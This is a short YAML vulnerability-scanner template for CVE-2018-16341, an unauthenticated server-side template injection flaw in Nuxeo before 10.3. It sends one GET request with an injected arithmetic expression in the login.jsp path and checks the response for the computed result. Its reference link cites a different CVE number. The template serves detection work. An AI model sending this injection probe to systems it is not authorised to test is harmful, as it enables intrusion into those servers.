29 lines
732 B
YAML
29 lines
732 B
YAML
id: CVE-2018-16341
|
|
|
|
info:
|
|
name: Nuxeo <10.3 - Remote Code Execution
|
|
author: madrobot
|
|
severity: high
|
|
description: |
|
|
Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection.
|
|
remediation: |
|
|
Upgrade Nuxeo to version 10.3 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-16299
|
|
classification:
|
|
cve-id: CVE-2018-16341
|
|
metadata:
|
|
max-request: 1
|
|
tags: cve,cve2018,nuxeo,ssti,rce,bypass
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "31333333337"
|